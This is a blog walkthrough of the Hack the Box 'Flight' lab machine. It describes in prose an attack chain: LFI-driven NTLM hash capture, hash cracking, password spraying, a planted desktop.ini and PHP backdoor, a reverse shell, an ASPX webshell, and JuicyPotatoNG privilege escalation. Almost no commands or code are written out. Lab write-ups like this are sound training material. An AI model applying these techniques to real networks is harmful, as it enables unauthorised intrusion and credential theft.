In this post, I would like to share a walkthrough of the Flight Machine from Hack the Box

This room will be considered a Hard machine on Hack the Box

What will you gain from the Flight machine?

For the user flag, you will need to retrieve the Net NTLMv2 hashes, and we should be able to get a plaintext password by using the hashcat tools. I will be using crackmapexec to execute some method of password spray which to locate another user that might use the same password. We also can write access to a share which we should be able to drop a malicious file on the SMB shares.

As for the root flag, you need to authenticate on the network as the machine account which we can upload a Simple WebShell ASPX to execute some command injection which we should obtain a shell connection back to us. We also can use the JuicyPotatoNG exploitation to obtain a root shell

Information Gathering on Flight Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

Let’s access the website interface

However, the website interface looks like an airlines type of website

Let’s enumerate the directory by using the gobuster tool but it’s nothing looks interesting at all.

As a result, let’s enumerate some subdomains that might help us with further escalation.

Let’s see the subdomain of the website which looks like it’s nothing, but the language seems to “latin

When trying to access the “About Us” where it might be vulnerable to a Local File Inclusion attack

Therefore, let’s try to test by entering “index.php” and the page look a little bit off.

The website has detected a “Suspicious Activity Blocked”

As a result, let’s start our Responder so that we can retrieve

We also need to start our smbserver as shown above.

Let’s retrieve the hash by executing the command above.

Finally, we managed to retrieve the hash as expected.

While using hashcat tool, we managed to obtain the password from the hashes.

Using Crackmapexec for Flight machine from our attacker’s machine

My Operating System doesn’t have crackmapexec for some reason so let’s install it on our machine. Sadly, the tool cannot be installed at all.

After a while of troubleshooting, i give up using the crackmapexec on Parrot OS and changed to using Kali Linux for this activity only.

The screenshot above shows the process of crackmapexec and let’s move back to our parrot os machine.

The command above shows the shares that the user has on the machine.

From the result, let’s access one of the shares that svc_apache has permission

Let’s access the Shared using the credentials of S.Moon and we see nothing

Using impacket-smbexec, we can find out which share is writable. But there seems to be customized code that prevents a lot of file types to be written: Shared

As a result, we can create a fake desktop.ini file which we can put the file into the server via smbclient

Therefore, we can insert the file by running the command “put desktop.ini”

We crack the new hash and get the C.Bum password

At least, we got the password for the c.bum

By using a similar method, we added a simple_backdoor.php on the machine via c.bum access

The content of the file would be something such as the above.

Let’s start our Python server

We managed to transfer the file to the server using the Python server

Finally, we have successfully the machine via the reverse shell connection

Again, we need to start our Python server using a different port

Therefore, let’s start our nc listener

As a result, the file “RunasCS.exe” have been downloaded on the machine.

Let’s run the command above to retrieve the reverse shell connection

Finally, we have succeeded to obtain the connection to us.

Access as c.bum privileges

We can read the user flag by using the command “type user.txt

Escalate to Admin Privileges Access on Flight Machine

Let’s check the port that is available on the server

Let’s transfer the “chisel” into the victim’s machine

On the attacker’s machine, we need to execute the command above.

On the other side, we are required to execute the command above.

The website will look something as shown in the screenshot above.

Let’s find the webshell on the internet

As a result, we need to upload the cmdasp.aspx on the victim’s machine

We need to transfer the file to the c:\inetpub\development\

We can verify that the file is stored there by looking inside the directory

Another step to ensure the cmdasp works, we need to execute the certutil.exe

Uwu! It works as I expected

Let’s start our nc listener

Let’s enter the command so that we will be able to obtain the reserve shell connection.

Therefore, let’s upload nc.exe onto the victim’s machine

Let’s use a different cmd interface

It looks like it works but the connection dies after a while.

After a few tries, we finally managed to retrieve the reverse shell connection

From the privileges information shown in the screenshot above, we are fully aware that JuicyPotato is vulnerable

As a result, let’s download JuicyPotatoNg into the victim’s machine

For us to obtain the nt authority\system privileges access, we need to execute the command above

Boom! We have success in the process

We can read the root flag by typing the command “type root.txt”

Categories:

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *